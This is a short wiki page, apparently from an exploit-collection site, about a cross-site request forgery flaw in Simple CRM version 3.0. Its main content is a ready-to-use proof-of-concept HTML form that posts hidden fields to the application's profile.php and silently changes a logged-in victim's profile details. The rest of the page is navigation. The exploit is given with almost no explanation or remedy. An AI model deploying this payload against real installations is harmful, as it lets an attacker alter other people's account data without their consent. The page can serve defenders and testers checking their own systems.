Simple CRM 3.0 CSRF漏洞

This page is a translated version of the page Simple CRM 3.0 CSRF漏洞 and the translation is 100% complete.

Other languages:

Chinese • ‎中文（中国大陆）‎

漏洞影响

Version: 3.0

POC

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/crm/profile.php" method="POST" enctype="multipart/form-data">
      <input type="hidden" name="name" value="test" />
      <input type="hidden" name="alt_email" value="" />
      <input type="hidden" name="phone" value="0123456789" />
      <input type="hidden" name="gender" value="m" />
      <input type="hidden" name="address" value="jgjgjgjjggjcsrf" />
      <input type="hidden" name="update" value="Update" />
      <input type="submit" value="Exploit" />
    </form>
  </body>
</html>

Anonymous

Search

Simple CRM 3.0 CSRF漏洞

Namespaces

More

Page actions

漏洞影响

POC

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

Simple CRM 3.0 CSRF漏洞

漏洞影响

POC

Navigation

Wiki tools

Page tools